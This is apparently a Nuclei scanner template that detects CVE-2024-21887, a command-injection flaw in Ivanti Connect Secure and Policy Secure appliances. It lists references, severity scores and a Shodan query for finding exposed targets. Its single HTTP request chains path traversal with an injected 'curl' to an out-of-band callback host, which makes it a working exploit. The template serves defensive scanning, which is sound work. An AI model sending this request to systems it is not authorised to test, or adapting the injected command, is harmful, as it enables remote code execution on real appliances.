id: CVE-2024-21887 info: name: Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection author: pdresearch,parthmalhotra,iamnoooob severity: critical description: A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. reference: - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US - http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html - https://github.com/farukokutan/Threat-Intelligence-Research-Reports - https://github.com/lions2012/Penetration_Testing_POC - https://github.com/Chocapikk/CVE-2024-21887 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2024-21887 cwe-id: CWE-77 epss-score: 0.97322 epss-percentile: 0.99871 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: "connect_secure" shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,kev,rce,ivanti http: - raw: - | GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: header words: - 'application/json' - type: word part: body words: - '"result":' - '"message":' condition: and # digest: 4b0a00483046022100dfcc3f9560479437b285218b46fa79b25d6dce508f57d8d245a7722be24d64f20221009d4ce1c5c3203ebbe9527f74aaa75ad7a4d72d26f812ed7ac78a4fd9451829ed:922c64590222798bb761d5b6d8e72950